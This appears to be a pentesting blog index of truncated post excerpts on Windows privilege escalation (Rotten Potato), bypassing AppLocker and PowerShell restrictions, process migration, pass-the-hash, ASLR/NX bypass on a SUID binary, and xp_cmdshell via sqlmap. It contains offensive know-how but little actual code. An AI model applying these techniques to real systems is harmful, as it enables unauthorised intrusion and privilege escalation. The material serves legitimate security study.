Never heard about the "Rotten Potato"? If not, read this post written by the authors of this fantastic exploit before continuing: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ The mechanism is quite complex, it allows us to intercept the NTLM authentication challenge which occurs during the  DCOM activation through  our endpoint listener and impersonate the user's security access  token  (in this case…

This seems to be  a never ending story but, believe me, there  are so many ways to achieve the same result! This time we are going to use another simple technique for running our powershell scripts without invoking powershell.exe. Introducing MSBuild.exe... MSBuild is a tool included in .Net frameworks for automating the processes of creating…

In your pentesting activities, there are many circumstances where you need to “migrate” your Windows working process, typically a shell,to a different process and some scenarios can be: You have an unstable shell and need to move to a more robust process on the victim's machine (typically explorer.exe which will live until the victim doesn't…

This is the third part of my "powershell-less" series: howto execute powershell scripts without using powershell.exe In part 2 I used  DotNetToJscript  in order to circumvent AppLocker policy. Now let's try to use another technique.  The problem is always the same: we cannot run executable files outside windows directories and  we can't run powershell.exe. Never heard…

In my previous post I showed you how to bypass policy restrictions which won't let you execute powershell.exe. Now let's move on to a more complicated (but realistic) scenario: you can't run exe files located outside the "classic" Windows directories because there is an App Locker policy which won't permit it Say bye-bye to powershell?…

Please don't misunderstand me, you really need Powershell and all it's magic if you are a pentester, don't you? But what can you do if some policy is blocking  access to powershell.exe?  Yes, this is a well known problem and there are many solutions. In my article I just want to focus on a quick…

Article can be found here: From pass the hash to pass the ticket!    

In this article we will try to bypass the ASLR (Address Space Layout Randomization) and  NX (non execute bit) techniques. So we got this 32 bit binary "overflow" without source code and root suid bit turned on! $ ls -al overflow -rwsr-sr-x 1 root root 7377 Jun 15 21:17 overflow   All we know is…

This article, written with my friend Giuseppe, is published here: http://resources.infosecinstitute.com/apk-golden-ticket-owning-android-smartphone-gaining-domain-admin-rights/  

Remember my last post, the "SYSTEM" challenge? Now let's modify the scenario.... Imagine you've got the xp_cmdshell running under this account: os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y [21:52:27] [INFO] theQL query used returns 1 entries [21:52:27] [INFO] retrieved: dummydomain\\andrew command standard output [1]: [*] dummydomain\andrew   Oh! This…